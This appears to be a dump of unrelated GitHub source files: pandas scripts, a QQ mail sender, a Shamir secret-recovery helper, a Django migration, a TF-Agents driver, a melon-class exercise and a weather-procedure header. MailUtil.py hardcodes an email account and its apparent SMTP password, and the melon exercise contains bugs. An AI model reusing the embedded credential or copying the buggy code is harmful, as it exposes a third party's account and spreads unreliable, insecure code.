# 'oemof_power_import': oemof_import['wh'] / 1000,
# 'hal_heat_import': hal_import['wh (heat)'] / 1000,
# 'oemof_heat_import': oemof_import['wh (heat)'] / 1000,
'hal_total_import': total_hal,
'oemof_total_import': total_oemof,
'import_diff': total_oemof - total_hal
},
index=oemof_import.index)
mixed_costs.plot(title=f"KWh imported ", ax=axes[0])
mixed_costs.cumsum().plot(title='Cummulated Imported KWh', ax=axes[1])
mixed_costs.sum().plot.bar(title='Total KWh comparison', ax=axes[2], grid=True)
def plot_heat_storage_details(oemof_results, result_dir, sim_name):
b, h_df = load_hal_storage_df(result_dir, sim_name)
oemof_results['heat_storage'].plot(kind='line', drawstyle='steps-post', title='Oemof Heat Storage Details',
subplots=True)
h_df.plot(subplots=True, title='HAL Heat Storage Details')
def plot_p2h_details(oemof_results, result_dir, sim_name):
p2h: DataFrame = load_hal_p2h_df(result_dir, sim_name)
oemof_results['b_h_data'].plot(kind='line', drawstyle='steps-post', title='Oemof Heat Flow', subplots=True)
p2h.plot(subplots=True, title='P2H Details')
def plot_prices(result_dir, sim_name):
b1: DataFrame = load_hal_b1_df(result_dir, sim_name)
p2h: DataFrame = load_hal_p2h_df(result_dir, sim_name)
fig, axes = plt.subplots(2, 1)
b1[['local_price']].plot(title='B1 Market Price', ax=axes[0])
p2h[['local_price']].plot(title='P2H Market Price', ax=axes[1])
| [
"smalla@jungehaie.com"
] | smalla@jungehaie.com |
03194fe1c2acc52f79cbbb67c76e3da83d9c9fe0 | 00f9aa8242466e87639604c2c650ba97991fc878 | /AID.py | 7d056760070587fb2b88d278073f99268294b313 | [] | no_license | rakshan-fathima/aura-analysis- | 9a4d984e0c43d9d385fb18cb6889c255f4103acf | 28aa8337b56a69ebbe1eced270e512adb880c9ed | refs/heads/main | 2023-07-14T00:57:28.598138 | 2021-08-18T19:30:19 | 2021-08-18T19:30:19 | 397,235,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,686 | py | import pandas as pd
from pandas._libs import indexing
from pandas.core.frame import DataFrame
import time
from datetime import datetime
import math
df = pd.read_csv('/Users/rakshanfathima/Desktop/data.csv')
print(df.to_string())
# counts number of times each AID is clicked
df.value_counts('AID')
array = []
# gets unique values from dataframe and stores in the array
array = df['AID'].unique()
print(array)
def timedifference():
for i in range(0, len(df_new)):
# print(i)
if i == 0:
continue
else:
df_new['TimeDifference'].iloc[i - 1] = df_new['TimeDifference'].iloc[i] - df_new['TimeDifference'].iloc[ i - 1]
def dataprocessing():
timediff = df_new['TimeDifference']
start = 0
for i in range(0, len(timediff)):
if (timediff[i] - timediff[0] >= 1800):
frame = df_new.iloc[start:i + 1]
frame['TimeStamp'] = frame['TimeStamp'].apply(lambda x: x.split(' ')[1])
frame['TimeStamp'] = frame['TimeStamp'].apply(lambda x: x.split(':'))
frame['TimeStamp'] = frame['TimeStamp'].apply(lambda x: int(x[0]) * 60 + int(x[1]))
# if condition - calculate if rows>1
if (len(frame) > 1):
mean = frame['TimeStamp'].mean()
mean_in_hours = mean / 60
std = frame['TimeStamp'].std()
std_in_hours = std/60
x = (mean_in_hours)
y = std_in_hours
low = x - y
high = x + y
minutes = mean_in_hours*60
minlow = (low%1) * 60
minhigh = (high%1) *60
mean_in_hours, minutes = divmod(minutes, 60)
print ( frame['AID'].iloc[0] , 'low :' "%02d:%02d"%(low,minlow), 'high :' "%02d:%02d"%(high,minhigh))
else:
print (frame['AID'].iloc[0], "%02d:%02d"%(mean_in_hours,minutes))
start = i + 1
for item in array[0:]:
#print (item)
# splits dataframes according to AID
df_new = df[df['AID'] == item]
print(df_new)
# extracting time from the TimeStamp
df['TimeDifference'] = df['TimeStamp'].apply(lambda x: x.split(' ')[1])
df_new['TimeDifference'] = df_new['TimeDifference'].apply(lambda x: x.split(':'))
df_new['TimeDifference'] = df_new['TimeDifference'].apply(lambda x: int(x[0]) * 60 * 60 + int(x[1]) * 60 + int(x[2]))
df_new.reset_index(level=None, drop=False, inplace=True, col_level=0, col_fill='')
timedifference()
dataprocessing()
| [
"noreply@github.com"
] | rakshan-fathima.noreply@github.com |
b21ca81ebbd84748400bf7a9b1252ac3a962a904 | 7163ba498cf98aaf8018b66fe0552406718ffa3d | /zjutapis/utils/MailUtil.py | bc4d6eb73158a1484d622dcdc9aa70b85e41325b | [] | no_license | chnnnnng/chngkit | 0222041e2c14ba9821d5fad832137441655b8517 | 5bbf07a6cd4cd3d21209aca64605b9cedac49ad2 | refs/heads/master | 2022-11-30T04:39:15.903659 | 2020-08-18T09:38:46 | 2020-08-18T09:38:46 | 276,799,600 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,017 | py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
import datetime
import smtplib
import time
from email.mime.text import MIMEText
from email.utils import formataddr
#用法:
# mail = MailUtil()
# ret = mail.setUser('596552206@qq.com').setTitle('nihaowa!').setContent('zheshicontent!').send()
# print('Success' if ret else 'Error')
class MailUtil:
__my_sender = '3340333414@qq.com' # 发件人邮箱账号
__my_pass = 'cyqamwgwljorchea' # 发件人邮箱密码
__title = ''
__content = ''
__user = ''
__html = '''
<table class="body" style="width: 100%; background-color: #fff;" width="100%" bgcolor="#fff"><tbody><tr>
<td style="vertical-align: top;" valign="top"></td>
<td class="container" style="vertical-align: top; display: block; max-width: 580px; width: 580px; margin: 0 auto; padding: 24px;" width="580" valign="top">
<div class="content" style="display: block; max-width: 580px; margin: 0 auto;">
<div class="header" style="width: 100%; padding-top: 8px; padding-bottom: 8px; margin-bottom: 16px; border-bottom-width: 1px; border-bottom-color: #eee; border-bottom-style: solid;">
<table style="width: 100%;" width="100%">
<tbody>
<tr>
<td style="vertical-align: top;" valign="top">
<a href="https://chng.fun" style="color: #0d1740; text-decoration: none;" rel="noopener" target="_blank">
<h2>CHNG · 小柏</h2>
</a>
</td>
</tr>
</tbody>
</table>
</div>
<div class="mb-2" style="margin-bottom: 8px !important;">
<div class="h2 lh-condensed" style="font-size: 24px !important; font-weight: 600 !important; line-height: 1.25 !important;">
{}
</div>
</div>
<div class="pb-2" style="padding-bottom: 8px !important;">
<div class="mb-3" style="margin-bottom: 16px !important;">
<p>{}</p>
</div>
</div>
<div class="footer" style="clear: both; width: 100%;">
<hr class="footer-hr" style="height: 0; overflow: visible; margin-top: 24px; border-top-color: #e1e4e8; border-top-style: solid; color: #959da5; font-size: 12px; line-height: 18px; margin-bottom: 30px; border-width: 1px 0 0;">
<p class="footer-text" style="font-weight: normal; color: #959da5; font-size: 12px; line-height: 18px; margin: 0 0 15px;">不要回复!不要回复!不要回复!</p>
</div>
</div>
</td>
<td style="vertical-align: top;" valign="top"></td>
</tr></tbody></table>
'''
def setTitle(self,title):
self.__title = title;
return self
def setContent(self,content):
self.__content = content
return self
def setUser(self,user):
self.__user = user
return self
def send(self):
if self.__user == '':
return False
if self.__title == '':
return False
if self.__content == '':
self.__content = self.__title
ret = True
try:
msg = MIMEText(self.__html.format(self.__title,self.__content), 'html', 'utf-8')
msg['From'] = formataddr(["小柏", self.__my_sender]) # 括号里的对应发件人邮箱昵称、发件人邮箱账号
msg['To'] = formataddr(["亲爱的陌生人", self.__user]) # 括号里的对应收件人邮箱昵称、收件人邮箱账号
msg['Subject'] = self.__title # 邮件的主题,也可以说是标题
server = smtplib.SMTP_SSL("smtp.qq.com", 465) # 发件人邮箱中的SMTP服务器,端口是25
server.login(self.__my_sender, self.__my_pass) # 括号中对应的是发件人邮箱账号、邮箱密码
server.sendmail(self.__my_sender, [self.__user, ], msg.as_string()) # 括号中对应的是发件人邮箱账号、收件人邮箱账号、发送邮件
server.quit() # 关闭连接
except Exception: # 如果 try 中的语句没有执行,则会执行下面的 ret=False
ret = False
return ret | [
"chenyang20010703@outlook.com"
] | chenyang20010703@outlook.com |
42dd0bfc1ee2056fa9d507a9f20221003145d2a8 | 32791ee75360bd7c6e7571be8f6e23af6aafabc2 | /Tools/shamir/shamir_scheme.py | bd422adbd7f4f0ead40a32d67eafb00df8d1ef9a | [] | no_license | joshuahaddad/CRYPTO | 69e47d5378af91710c74c1c760a472fbf9b65a30 | d11aea92d8f89f608ef7367db250cce69a7e42b8 | refs/heads/master | 2020-08-05T03:48:27.945400 | 2019-10-02T15:58:00 | 2019-10-02T15:58:00 | 212,382,641 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,417 | py | import requests
import os
from Crypto.Util.number import *
import threading
"""
Original code:
https://github.com/perfectblue/ctf-writeups/blob/master/csaw-ctf-2019-quals/timelie-150/solve.py
This framework can be used to crack a Shamir Sharing scheme
If the key is split into multiple parts, it is probably a Shamir Scheme
Given S = key, S is divided into n pieces Sn
Knowing k pieces allows the reconstruction of S.
This is based on the idea that 2 points are needed for a line, 3 for parab, etc
For any curve, you need k-1 points to define the curve where k = order
Curve is constructed with f(x) = a_0 + a_1x + ... + a_(k-1)x^(k-1)
k is the number of parts you would need to reconstruct the curve
a_0 = Secret = S
Take integers i such that i is an integer and f(i) = integer, these are the pieces
Coefficients are found for the curve using interpolation.
"""
"""
USAGE:
Write something to gather shares. Send array of shares to recover_secret()
"""
def _eval_at(poly, x, prime):
'''evaluates polynomial (coefficient tuple) at x, used to generate a
shamir pool in make_random_shares below.
'''
accum = 0
for coeff in reversed(poly):
accum *= x
accum += coeff
accum %= prime
return accum
def _extended_gcd(a, b):
'''
division in integers modulus p means finding the inverse of the
denominator modulo p and then multiplying the numerator by this
inverse (Note: inverse of A is B such that A*B % p == 1) this can
be computed via extended Euclidean algorithm
http://en.wikipedia.org/wiki/Modular_multiplicative_inverse#Computation
'''
x = 0
last_x = 1
y = 1
last_y = 0
while b != 0:
quot = a // b
a, b = b, a%b
x, last_x = last_x - quot * x, x
y, last_y = last_y - quot * y, y
return last_x, last_y
def _divmod(num, den, p):
'''compute num / den modulo prime p
To explain what this means, the return value will be such that
the following is true: den * _divmod(num, den, p) % p == num
'''
inv, _ = _extended_gcd(den, p)
return num * inv
def _lagrange_interpolate(x, x_s, y_s, p):
'''
Find the y-value for the given x, given n (x, y) points;
k points will define a polynomial of up to kth order
'''
k = len(x_s)
assert k == len(set(x_s)), "points must be distinct"
def PI(vals): # upper-case PI -- product of inputs
accum = 1
for v in vals:
accum *= v
return accum
nums = [] # avoid inexact division
dens = []
for i in range(k):
others = list(x_s)
cur = others.pop(i)
nums.append(PI(x - o for o in others))
dens.append(PI(cur - o for o in others))
den = PI(dens)
num = sum([_divmod(nums[i] * den * y_s[i] % p, dens[i], p)
for i in range(k)])
return (_divmod(num, den, p) + p) % p
def recover_secret(shares, prime):
'''
Recover the secret from share points
(x,y points on the polynomial)
'''
if len(shares) < 2:
raise ValueError("need at least two shares")
x_s, y_s = zip(*shares)
return _lagrange_interpolate(0, x_s, y_s, prime)
#Input prime used for shamir scheme
P = 101109149181191199401409419449461491499601619641661691809811881911
#Input shares as a array of tuples
shares = [(1, 1494), (2, 1942), (3,2578)]
#Get secret
print(recover_secret(shares, P))
print("DONE")
| [
"joshuahaddad@ufl.edu"
] | joshuahaddad@ufl.edu |
4f5087097ca2cae5e745fbb0c584e49824c602e8 | 3323e54364b4f4543e585b3d157ed9b52de02ade | /math3/tests/test_integer.py | 3e2e6c09d76edc857718fd33688737bed5107fbb | [
"BSD-3-Clause"
] | permissive | PhloxAR/math3 | f8fbc51687abf1d909b100648035ed8be1265dc6 | 6c8e4066ae74b607cefa209c42cb19e26c09c600 | refs/heads/master | 2021-01-18T11:37:11.249811 | 2016-05-22T15:23:40 | 2016-05-22T15:23:40 | 58,250,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 367 | py | try:
import unittest2 as unittest
except:
import unittest
from math3.funcs import integer
class test_integer(unittest.TestCase):
def test_import(self):
import math3
math3.funcs.intfunc
def test_count_bits(self):
i = 0b010101
self.assertEqual(integer.count_bits(i), 3)
if __name__ == '__main__':
unittest.main()
| [
"matthias_cy@outlook.com"
] | matthias_cy@outlook.com |
2b92b3efeb473525078506ea21078fc0c598e1d5 | feaf83d9329cc21272dc1c018c38824c576f8730 | /task04/string_methods.py | 35cb0881a966fea919e4ca08a65827bc768c82ef | [] | no_license | aditir360/LMSClub | 6c9b60a898a1007b7ec2e067714a9385b125b563 | 3f96a4be2d245b7aee60e28c4e8d36d194f7f848 | refs/heads/master | 2023-02-03T02:28:41.464166 | 2020-12-28T00:06:12 | 2020-12-28T00:06:12 | 296,700,210 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | #!/usr/bin/env python3
#
# This is my code which includes functions that apply for strings.
#
def main():
# FIRST EXAMPLE
txt = "Python is an awesome and easy Programming Language to learn!"
# My txt.
txt_using_function_task04 = txt.casefold()
# This is where I apply a function that will make all letters in the txt lowercase.
print(txt_using_function_task04)
# I printed the txt_using_function, to see the result.
# SECOND EXAMPLE
txt1 = "python is an awesome and easy programming language to learn!"
# My txt.
txt1_using_function_task04 = txt1.capitilize()
# This is where I apply a function that will capitilize the first letter in the txt.
print(txt1_using_function_task04)
# I printed the txt1_using_function, to see the result.
| [
"noreply@github.com"
] | aditir360.noreply@github.com |
061837399d3afe6268af1545249000dc7f583c40 | b9429e2a5b6ebef0e4c87976a82bf4dc075ba27b | /shop/migrations/0004_auto_20200401_0951.py | 0c50516722bfe7a9e44768053b6163f0dbf25522 | [] | no_license | MakboolAhmad/jankin | 97f23014e653499e80939cdc7166fee52ae8b232 | 1a2165e539aba00be101cf599552a8b5434a4283 | refs/heads/master | 2021-08-06T10:05:39.502249 | 2020-04-06T12:22:14 | 2020-04-06T12:22:14 | 253,489,664 | 0 | 0 | null | 2021-06-10T22:44:07 | 2020-04-06T12:23:34 | HTML | UTF-8 | Python | false | false | 533 | py | # Generated by Django 2.2 on 2020-04-01 09:51
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('shop', '0003_auto_20200330_0743'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='address',
),
migrations.RemoveField(
model_name='product',
name='city',
),
migrations.RemoveField(
model_name='product',
name='location',
),
]
| [
"makboolk20@gmail.com"
] | makboolk20@gmail.com |
3707cc9f6db7ca10359cd0dda2184f7a2c877a56 | 3587e1e6c5a91d9090d5df2521c9e6ad04cff40f | /includes/libraries/Balanced/scenarios/credit_customer_list/metadata.py | 12868ab8d2814e7b7492c953b255ffbdd3128ef8 | [
"MIT"
] | permissive | bmoney85/EDD-Balanced-Gateway | e13f9bc8f43313847b7d7f941932bfe9cbe411ee | 474d7e724b2d274b4c371141f8a6ac2bf83c919c | refs/heads/master | 2021-05-28T01:32:33.599032 | 2014-04-03T20:01:01 | 2014-04-03T20:01:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | customer = json.loads(
storage['customer_add_bank_account']['response']
)
request = {
'customer_uri': customer['uri'],
'uri': customer['credits_uri'],
'payload': {
'amount': 100,
},
} | [
"dgriffiths@ghost1227.com"
] | dgriffiths@ghost1227.com |
82b234535f523b9c06304b37de9a22bc067c7c74 | c50d9ce8073048532e4556f862f775c4caf5e011 | /examples/receive.py | 70414efbe69bfb12507652804ae2fecb88fb22d2 | [
"MIT"
] | permissive | rickhanlonii/aamnotifs | bc27614a92d6ae27478a3960808d455d6e3b5268 | 8ef14f99ba052e38d30f77d56de38273bf791254 | refs/heads/master | 2021-01-16T20:03:42.459909 | 2013-07-25T13:20:02 | 2013-07-25T13:24:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | ################################################################################
# Simple(st) example for receiving notifications.
################################################################################
import notifs
def print_notification(title, message):
print "Notification received: {0}: {1}".format(title, message)
try:
n = notifs.Notifs("amqps://user:password@domain.tld:5673/%2F")
# The routing_name is the name of the "channel" you want to use
# it can be "mail", "chat", etc.
# This will make it easy to choose which channels your clients
# will receive. Can be a list too, for listening on multiple streams.
n.receive("test_channel", print_notification)
except KeyboardInterrupt:
break
| [
"andrei@marcu.net"
] | andrei@marcu.net |
468bc121358fe3b51c60fe2cdcefb8ee07f614ff | ca3799ce88e9b9ad84bcec00e68dd8c615fdbb3d | /Trabalho_1/core/migrations/0001_initial.py | 993ad8c2c1e789e517faba7354a835b3d0bb89f7 | [
"MIT"
] | permissive | desenho-sw-g5/service_control | d8b4129d33466084239df9f18986e004474ff2b6 | ed0496f72643ac004d58126ac486a6e0c47643cd | refs/heads/devel | 2021-01-20T02:32:52.321505 | 2017-11-27T11:33:15 | 2017-11-27T11:33:15 | 101,324,220 | 3 | 0 | null | 2017-11-24T10:23:14 | 2017-08-24T18:09:29 | Python | UTF-8 | Python | false | false | 769 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-14 16:13
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='person', to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"matheusrichardt@gmail.com"
] | matheusrichardt@gmail.com |
1581da937574006f29adc83b6be0f88522e15faf | 4f375eec10cd2266c0280aae5ff2704560b6b00f | /DjangoUniversity/venv/bin/django-admin.py | 41744146756b479214d5b32dc5368edad318cd26 | [] | no_license | Jaibean/Python | f1dff66269cce1cdc034c40dd70975870acb7cbf | a9ebcdf2b74f60d80a88d7b76021995d84e7ee8d | refs/heads/main | 2023-05-08T14:33:25.616586 | 2021-05-29T03:20:27 | 2021-05-29T03:20:27 | 317,381,497 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 706 | py | #!/Users/jaimiebertoli/PycharmProjects/DjangoUniversity/venv/bin/python
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"jaimie.bertoli@gmail.com"
] | jaimie.bertoli@gmail.com |
c737c2c9df7e4e431e045cdd97aecd4aa4483742 | dcbb4a526f6cf6f490063a6e4b5f1353fda48a1f | /tf_agents/drivers/tf_driver.py | de16194c74cf80ce5e092c4607046a47a02b73ac | [
"Apache-2.0"
] | permissive | Bhaney44/agents | 91baf121188f35024c09435276d108600ba6f07e | 792d7c6e769d708f8b08d71926ccb9e8a880efef | refs/heads/master | 2023-08-09T03:51:16.188708 | 2023-07-21T17:50:18 | 2023-07-21T17:50:18 | 177,231,436 | 0 | 0 | Apache-2.0 | 2019-03-23T01:46:03 | 2019-03-23T01:46:02 | null | UTF-8 | Python | false | false | 5,527 | py | # coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Driver that steps a TF environment using a TF policy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Any, Callable, Optional, Sequence, Tuple
import numpy as np
import tensorflow as tf # pylint: disable=g-explicit-tensorflow-version-import
from tf_agents.drivers import driver
from tf_agents.environments import tf_environment
from tf_agents.policies import tf_policy
from tf_agents.trajectories import time_step as ts
from tf_agents.trajectories import trajectory
from tf_agents.typing import types
from tf_agents.utils import common
class TFDriver(driver.Driver):
"""A driver that runs a TF policy in a TF environment."""
def __init__(
self,
env: tf_environment.TFEnvironment,
policy: tf_policy.TFPolicy,
observers: Sequence[Callable[[trajectory.Trajectory], Any]],
transition_observers: Optional[Sequence[Callable[[trajectory.Transition],
Any]]] = None,
max_steps: Optional[types.Int] = None,
max_episodes: Optional[types.Int] = None,
disable_tf_function: bool = False):
"""A driver that runs a TF policy in a TF environment.
**Note** about bias when using batched environments with `max_episodes`:
When using `max_episodes != None`, a `run` step "finishes" when
`max_episodes` have been completely collected (hit a boundary).
When used in conjunction with environments that have variable-length
episodes, this skews the distribution of collected episodes' lengths:
short episodes are seen more frequently than long ones.
As a result, running an `env` of `N > 1` batched environments
with `max_episodes >= 1` is not the same as running an env with `1`
environment with `max_episodes >= 1`.
Args:
env: A tf_environment.Base environment.
policy: A tf_policy.TFPolicy policy.
observers: A list of observers that are notified after every step
in the environment. Each observer is a callable(trajectory.Trajectory).
transition_observers: A list of observers that are updated after every
step in the environment. Each observer is a callable((TimeStep,
PolicyStep, NextTimeStep)). The transition is shaped just as
trajectories are for regular observers.
max_steps: Optional maximum number of steps for each run() call. For
batched or parallel environments, this is the maximum total number of
steps summed across all environments. Also see below. Default: 0.
max_episodes: Optional maximum number of episodes for each run() call. For
batched or parallel environments, this is the maximum total number of
episodes summed across all environments. At least one of max_steps or
max_episodes must be provided. If both are set, run() terminates when at
least one of the conditions is
satisfied. Default: 0.
disable_tf_function: If True the use of tf.function for the run method is
disabled.
Raises:
ValueError: If both max_steps and max_episodes are None.
"""
common.check_tf1_allowed()
max_steps = max_steps or 0
max_episodes = max_episodes or 0
if max_steps < 1 and max_episodes < 1:
raise ValueError(
'Either `max_steps` or `max_episodes` should be greater than 0.')
super(TFDriver, self).__init__(env, policy, observers, transition_observers)
self._max_steps = max_steps or np.inf
self._max_episodes = max_episodes or np.inf
if not disable_tf_function:
self.run = common.function(self.run, autograph=True)
def run( # pytype: disable=signature-mismatch # overriding-parameter-count-checks
self, time_step: ts.TimeStep,
policy_state: types.NestedTensor = ()
) -> Tuple[ts.TimeStep, types.NestedTensor]:
"""Run policy in environment given initial time_step and policy_state.
Args:
time_step: The initial time_step.
policy_state: The initial policy_state.
Returns:
A tuple (final time_step, final policy_state).
"""
num_steps = tf.constant(0.0)
num_episodes = tf.constant(0.0)
while num_steps < self._max_steps and num_episodes < self._max_episodes:
action_step = self.policy.action(time_step, policy_state)
next_time_step = self.env.step(action_step.action)
traj = trajectory.from_transition(time_step, action_step, next_time_step)
for observer in self._transition_observers:
observer((time_step, action_step, next_time_step))
for observer in self.observers:
observer(traj)
num_episodes += tf.math.reduce_sum(
tf.cast(traj.is_boundary(), tf.float32))
num_steps += tf.math.reduce_sum(tf.cast(~traj.is_boundary(), tf.float32))
time_step = next_time_step
policy_state = action_step.state
return time_step, policy_state
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
9e25a76b082548ee94432dc821353a29a8e5f423 | 107973063f26b791ccd6deca0026acb338eb4d6b | /harvest.py | 8631b158987a039be018791b790f53b2a123623b | [] | no_license | sonya-sa/melon-objects | 322b46138ee9287b74cf8eb50bae64f56eb50e23 | a035db0be16e749a0654cc8518315f408efc72bc | refs/heads/master | 2020-03-10T10:15:07.606336 | 2018-04-13T01:09:39 | 2018-04-13T01:09:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,986 | py | ############
# Part 1 #
############
class MelonType(object):
"""A species of melon at a melon farm."""
def __init__(self, code, first_harvest, color, is_seedless, is_bestseller, name):
"""Initialize a melon."""
self.code = code
self.first_harvest = first_harvest
self.color = color
self.is_seedless = is_seedless
self.is_bestseller = is_bestseller
self.name = name
self.pairings = []
# Fill in the rest
def add_pairing(self, pairing):
"""Add a food pairing to the instance's pairings list."""
self.pairings.extend(pairing)
# Fill in the rest
def update_code(self, new_code):
"""Replace the reporting code with the new_code."""
self.code = new_code
# Fill in the rest
def make_melon_types():
"""Returns a listmy of current melon types."""
all_melon_types = []
musk = MelonType('musk', 1998, 'green',
True, True, 'Muskmelon')
musk.add_pairing(['mint'])
all_melon_types.append(musk)
casaba = MelonType('cas', 2003, 'orange',
True, False, 'Casaba')
casaba.add_pairing(['mint', 'strawberries'])
all_melon_types.append(casaba)
crenshaw = MelonType('cren', 1996, 'green', True, False, 'Crenshaw')
crenshaw.add_pairing(['proscuitto'])
all_melon_types.append(crenshaw)
yellow_watermelon = MelonType('yw', 2013, 'yellow', True, True, 'Yellow Watermelon')
yellow_watermelon.add_pairing(['ice cream'])
all_melon_types.append(yellow_watermelon)
return all_melon_types
def print_pairing_info(melon_types):
"""Prints information about each melon type's pairings."""
# Fill in the rest
for melon_type in melon_types:
print "{} pairs well with".format(melon_type.name)
pairings = melon_type.pairings
for pairing in pairings:
print "- {}".format(pairing)
print ""
def make_melon_type_lookup(melon_types):
"""Takes a list of MelonTypes and returns a dictionary of melon type by code."""
codes = {}
for melon_type in melon_types:
codes[melon_type.code] = melon_type
# Fill in the rest
return codes
############
# Part 2 #
############
# all_melon_types = make_melon_types()
# make_melon
class Melon(object):
"""A melon in a melon harvest."""
self.all_melon_types = make_melon_type_lookup(make_melon_types())
def __init__ (self, melon_code, shape_rating, color_rating, from_field, harvested_by):
self.melon_type = self.all_melon_types[melon_code]
self.shape_rating = shape_rating
self.color_rating = color_rating
self.from_field = from_field
self.harvested_by = harvested_by
def is_sellable():
if (self.from_field != 3) and (self.shape_rating >= 5) and (self.color_rating >= 5):
return True
return False
# Fill in the rest
# Needs __init__ and is_sellable methods
def make_melons(melon_types):
"""Returns a list of Melon objects."""
# Fill in the rest
melon_objects = []
melon1 = Melon('yw', 8, 7, 2, 'Sheila')
melon_objects.append(melon1)
melon2 = Melon('yw', 3, 4, 2, 'Shei1a')
melon_objects.append(melon2)
melon3 = Melon('yw', 9, 8, 3, 'Sheila')
melon_objects.append(melon3)
melon4 = Melon('cas', 10, 6, 35, 'Sheila')
melon_objects.append(melon4)
melon5 = Melon('cren',8,9,35,'Michael')
melon_objects.append(melon5)
melon6 = Melon('cren', 8, 2, 35, 'Michael')
melon_objects.append(melon6)
melon7 = Melon('cren', 6,7,4, 'Michael')
melon_objects.append(melon7)
melon8 = Melon('musk', 6,7,4, 'Michael')
melon_objects.append(melon8)
melon9 = Melon('yw',7,10,3,'Sheila')
melon_objects.append(melon9)
return melon_objects
def get_sellability_report(melons):
"""Given a list of melon object, prints whether each one is sellable."""
# Fill in the rest
| [
"no-reply@hackbrightacademy.com"
] | no-reply@hackbrightacademy.com |
5c8494e379adb3963beead9dc40e803a8116cb46 | 3de3dae722829727edfdd6cc3b67443a69043475 | /cave/com.raytheon.viz.gfe/localization/gfe/userPython/procedures/SnowAmtQPFPoPWxCheck.py | 9d7c3a3c8577a8c463d088e2adc2ec0c09f4fe61 | [
"LicenseRef-scancode-public-domain",
"Apache-2.0"
] | permissive | Unidata/awips2 | 9aee5b7ec42c2c0a2fa4d877cb7e0b399db74acb | d76c9f96e6bb06f7239c563203f226e6a6fffeef | refs/heads/unidata_18.2.1 | 2023-08-18T13:00:15.110785 | 2023-08-09T06:06:06 | 2023-08-09T06:06:06 | 19,332,079 | 161 | 75 | NOASSERTION | 2023-09-13T19:06:40 | 2014-05-01T00:59:04 | Java | UTF-8 | Python | false | false | 61,851 | py | ##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
#----------------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without technical
# support, and with no warranty, express or implied, as to its usefulness for
# any purpose.
#
# SnowAmtQPFPoPWxCheck
#
# Author: Jay Smith, WFO Fairbanks, jay.smith@noaa.gov, 907-458-3721
# Version: 1.0.0, 09/14/2006 - Initial version
# 1.0.1, 10/12/2006 - Added PoP/QPF check at request of DSPAC
# 1.0.2, 10/18/2006 - Changed PoP/QPF check to treat the PoP as
# floating. Instead of checking each individual PoP grid
# against its corresponding QPF grid, the max of all the
# PoP grids overlapping a QPF grid will be checked.
# 1.1.0, 01/25/2007 - Added options to choose which checks to run.
# Reorganized code so that each check is its own method.
# Added a check for QPF and Wx. Added highlighting for the
# created temporary grids.
# 1.1.1, 02/01/2007 - Changed the SnowAmt/Wx check to return
# consistent results for SnowAmt > 0 and Wx grid containing
# S, SW, or IP regardless of whether the frozen precip is
# mixed with freezing and/or liquid precip.
# 1.2.0, 02/13/2007 - Added a configuration option to provide a CWA
# edit area to run the procedure over. A bad edit area or no
# edit area will result in running over the whole domain.
# Modified the SnowAmt/Wx and QPF/Wx checks to handle two
# cases. Case 1: The SnowAmt/QPF grid is 6-hr long and starts
# at 00, 06, 12, or 18 UTC. Then only one of the corresponding
# Wx grids has to meet the consistency rule. Case 2: The
# SnowAmt/QPF grid does not meet the case 1 definition. Then
# all of the corresponding Wx grids must meet the consistency
# rule.
# The procedure performs the following checks:
# 1. If SnowAmt present and >= 0.5 inches, then corresponding QPF grids
# must add up to 0.01 inches.
# 2. If SnowAmt >= 0.1 inches, then there are two cases:
# a. If the SnowAmt grid is exactly 6 hours long and starts at 00, 06, 12,
# or 18 UTC, then at least one of the corresponding Wx grids must have
# S, SW, or IP.
# b. If the SnowAmt grid does not adhere to the time constraints listed in
# in the previous paragraph, then all of the corresponding Wx grids
# must have S, SW, or IP. This more stringent test is required because
# with grids offset from the NDFD time constraints, it's possible for
# the GFE to evaluate the grids as consistent using an "any"
# criteria but have the NDFD flag those same grids as inconsistent.
